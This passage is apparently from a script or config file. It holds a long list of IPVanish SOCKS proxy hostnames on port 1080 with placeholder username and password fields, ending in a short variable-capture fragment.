-c04.ipvanish.com:1080:<Username>:<Password>\\nzrh-c05.ipvanish.com:1080:<Username>:<Password>\\nzrh-c06.ipvanish.com:1080:<Username>:<Password>\\nzrh-c07.ipvanish.com:1080:<Username>:<Password>\\nzrh-c08.ipvanish.com:1080:<Username>:<Password>\\nzrh-c09.ipvanish.com:1080:<Username>:<Password>\\nyul-c07.ipvanish.com:1080:<Username>:<Password>\\nyul-c08.ipvanish.com:1080:<Username>:<Password>\\nyul-c09.ipvanish.com:1080:<Username>:<Password>\\nyul-c10.ipvanish.com:1080:<Username>:<Password>\\nyul-c11.ipvanish.com:1080:<Username>:<Password>\\nyul-c12.ipvanish.com:1080:<Username>:<Password>\\nyul-c13.ipvanish.com:1080:<Username>:<Password>\\nyul-c14.ipvanish.com:1080:<Username>:<Password>\\nyul-c15.ipvanish.com:1080:<Username>:<Password>\\nyul-c16.ipvanish.com:1080:<Username>:<Password>\\nyul-c17.ipvanish.com:1080:<Username>:<Password>\\nyul-c01.ipvanish.com:1080:<Username>:<Password>\\nyul-c03.ipvanish.com:1080:<Username>:<Password>\\nyul-c02.ipvanish.com:1080:<Username>:<Password>\\nyul-c04.ipvanish.com:1080:<Username>:<Password>\\nyul-c06.ipvanish.com:1080:<Username>:<Password>\\nyul-c05.ipvanish.com:1080:<Username>:<Password>\\ntor-a12.ipvanish.com:1080:<Username>:<Password>\\ntor-a14.ipvanish.com:1080:<Username>:<Password>\\ntor-a16.ipvanish.com:1080:<Username>:<Password>\\ntor-a18.ipvanish.com:1080:<Username>:<Password>\\ntor-a20.ipvanish.com:1080:<Username>:<Password>\\ntor-a11.ipvanish.com:1080:<Username>:<Password>\\ntor-a13.ipvanish.com:1080:<Username>:<Password>\\ntor-a15.ipvanish.com:1080:<Username>:<Password>\\ntor-a17.ipvanish.com:1080:<Username>:<Password>\\ntor-a19.ipvanish.com:1080:<Username>:<Password>\\ntor-a02.ipvanish.com:1080:<Username>:<Password>\\ntor-a04.ipvanish.com:1080:<Username>:<Password>\\ntor-a06.ipvanish.com:1080:<Username>:<Password>\\ntor-a08.ipvanish.com:1080:<Username>:<Password>\\ntor-a10.ipvanish.com:1080:<Username>:<Password>\\ntor-a01.ipvanish.com:1080:<Username>:<Password>\\ntor-a03.ipvanish.com:1080:<Username>:<Password>\\ntor-a05.ipvanish.com:1080:<Username>:<Password>\\ntor-a07.ipvanish.com:1080:<Username>:<Password>\\ntor-a09.ipvanish.com:1080:<Username>:<Password>\\nyvr-c01.ipvanish.com:1080:<Username>:<Password>\\nyvr-c02.ipvanish.com:1080:<Username>:<Password>\\nyvr-c03.ipvanish.com:1080:<Username>:<Password>\\nyvr-c04.ipvanish.com:1080:<Username>:<Password>\\nyvr-c05.ipvanish.com:1080:<Username>:<Password>\\nyvr-c06.ipvanish.com:1080:<Username>:<Password>\\nyvr-c07.ipvanish.com:1080:<Username>:<Password>\\ngig-a01.ipvanish.com:1080:<Username>:<Password>\\ngig-a02.ipvanish.com:1080:<Username>:<Password>\\ngig-a03.ipvanish.com:1080:<Username>:<Password>\\ngig-a04.ipvanish.com:1080:<Username>:<Password>\\ngig-a05.ipvanish.com:1080:<Username>:<Password>\\ngig-a06.ipvanish.com:1080:<Username>:<Password>\\ngig-a07.ipvanish.com:1080:<Username>:<Password>\\ngig-a08.ipvanish.com:1080:<Username>:<Password>\\ngru-a02.ipvanish.com:1080:<Username>:<Password>\\ngru-a03.ipvanish.com:1080:<Username>:<Password>\\ngru-a04.ipvanish.com:1080:<Username>:<Password>\\ngru-a05.ipvanish.com:1080:<Username>:<Password>\\ngru-a06.ipvanish.com:1080:<Username>:<Password>\\ngru-a07.ipvanish.com:1080:<Username>:<Password>\\ngru-a09.ipvanish.com:1080:<Username>:<Password>\\ngru-a12.ipvanish.com:1080:<Username>:<Password>\\ngru-a01.ipvanish.com:1080:<Username>:<Password>\\nsof-c01.ipvanish.com:1080:<Username>:<Password>\\nsof-c04.ipvanish.com:1080:<Username>:<Password>\\nsof-c05.ipvanish.com:1080:<Username>:<Password>\\nsof-c06.ipvanish.com:1080:<Username>:<Password>\\nbru-c04.ipvanish.com:1080:<Username>:<Password>\\nbru-c05.ipvanish.com:1080:<Username>:<Password>\\nbru-c06.ipvanish.com:1080:<Username>:<Password>\\nbru-c01.ipvanish.com:1080:<Username>:<Password>\\nbru-c02.ipvanish.com:1080:<Username>:<Password>\\nbru-c09.ipvanish.com:1080:<Username>:<Password>\\nbru-c03.ipvanish.com:1080:<Username>:<Password>\\nbru-c10.ipvanish.com:1080:<Username>:<Password>\\nbru-c11.ipvanish.com:1080:<Username>:<Password>\\nbru-c12.ipvanish.com:1080:<Username>:<Password>\\nbru-c13.ipvanish.com:1080:<Username>:<Password>\\nbru-c14.ipvanish.com:1080:<Username>:<Password>\\nbru-c15.ipvanish.com:1080:<Username>:<Password>\\nbru-c07.ipvanish.com:1080:<Username>:<Password>\\nbne-c02.ipvanish.com:1080:<Username>:<Password>\\nbne-c01.ipvanish.com:1080:<Username>:<Password>\\nbne-c03.ipvanish.com:1080:<Username>:<Password>\\nbne-c04.ipvanish.com:1080:<Username>:<Password>\\nbne-c05.ipvanish.com:1080:<Username>:<Password>\\nbne-c06.ipvanish.com:1080:<Username>:<Password>\\nmel-a01.ipvanish.com:1080:<Username>:<Password>\\nmel-a03.ipvanish.com:1080:<Username>:<Password>\\nmel-a05.ipvanish.com:1080:<Username>:<Password>\\nmel-a07.ipvanish.com:1080:<Username>:<Password>\\nmel-a02.ipvanish.com:1080:<Username>:<Password>\\nmel-a04.ipvanish.com:1080:<Username>:<Password>\\nmel-a06.ipvanish.com:1080:<Username>:<Password>\\nper-c01.ipvanish.com:1080:<Username>:<Password>\\nper-c02.ipvanish.com:1080:<Username>:<Password>\\nper-c03.ipvanish.com:1080:<Username>:<Password>\\nper-c04.ipvanish.com:1080:<Username>:<Password>\\nper-c05.ipvanish.com:1080:<Username>:<Password>\\nper-c06.ipvanish.com:1080:<Username>:<Password>\\nsyd-a02.ipvanish.com:1080:<Username>:<Password>\\nsyd-a03.ipvanish.com:1080:<Username>:<Password>\\nsyd-a04.ipvanish.com:1080:<Username>:<Password>\\nsyd-a05.ipvanish.com:1080:<Username>:<Password>\\nsyd-a06.ipvanish.com:1080:<Username>:<Password>\\nsyd-a07.ipvanish.com:1080:<Username>:<Password>\\nsyd-a08.ipvanish.com:1080:<Username>:<Password>\\nsyd-a09.ipvanish.com:1080:<Username>:<Password>\\nsyd-a10.ipvanish.com:1080:<Username>:<Password>\\nsyd-a11.ipvanish.com:1080:<Username>:<Password>\\nsyd-a12.ipvanish.com:1080:<Username>:<Password>\\nsyd-a13.ipvanish.com:1080:<Username>:<Password>\\nsyd-a14.ipvanish.com:1080:<Username>:<Password>\\nsyd-a15.ipvanish.com:1080:<Username>:<Password>\\nsyd-a16.ipvanish.com:1080:<Username>:<Password>\\nsyd-a17.ipvanish.com:1080:<Username>:<Password>\\nsyd-a18.ipvanish.com:1080:<Username>:<Password>\\nsyd-a19.ipvanish.com:1080:<Username>:<Password>\\nsyd-a20.ipvanish.com:1080:<Username>:<Password>\\nsyd-a21.ipvanish.com:1080:<Username>:<Password>\\nsyd-a22.ipvanish.com:1080:<Username>:<Password>\\nsyd-a23.ipvanish.com:1080:<Username>:<Password>\\nsyd-a24.ipvanish.com:1080:<Username>:<Password>\\nsyd-a25.ipvanish.com:1080:<Username>:<Password>\\nsyd-a26.ipvanish.com:1080:<Username>:<Password>\\nsyd-a27.ipvanish.com:1080:<Username>:<Password>\\nsyd-a28.ipvanish.com:1080:<Username>:<Password>\\nsyd-a29.ipvanish.com:1080:<Username>:<Password>\\nsyd-a30.ipvanish.com:1080:<Username>:<Password>\\nvie-c04.ipvanish.com:1080:<Username>:<Password>\\nvie-c05.ipvanish.com:1080:<Username>:<Password>\\nvie-c06.ipvanish.com:1080:<Username>:<Password>\\nvie-c07.ipvanish.com:1080:<Username>:<Password>\\nvie-c08.ipvanish.com:1080:<Username>:<Password>\\nvie-c09.ipvanish.com:1080:<Username>:<Password>\\neze-c02.ipvanish.com:1080:<Username>:<Password>\\neze-c03.ipvanish.com:1080:<Username>:<Password>\\neze-c04.ipvanish.com:1080:<Username>:<Password>\\neze-c01.ipvanish.com:1080:<Username>:<Password>\\ntia-c02.ipvanish.com:1080:<Username>:<Password>\\ntia-c03.ipvanish.com:1080:<Username>:<Password>\\ntia-c04.ipvanish.com:1080:<Username>:<Password>\\ntia-c05.ipvanish.com:1080:<Username>:<Password>\\ndxb-c01.ipvanish.com:1080:<Username>:<Password>\\ndxb-c02.ipvanish.com:1080:<Username>:<Password>\\n" -> CAP "Save" 


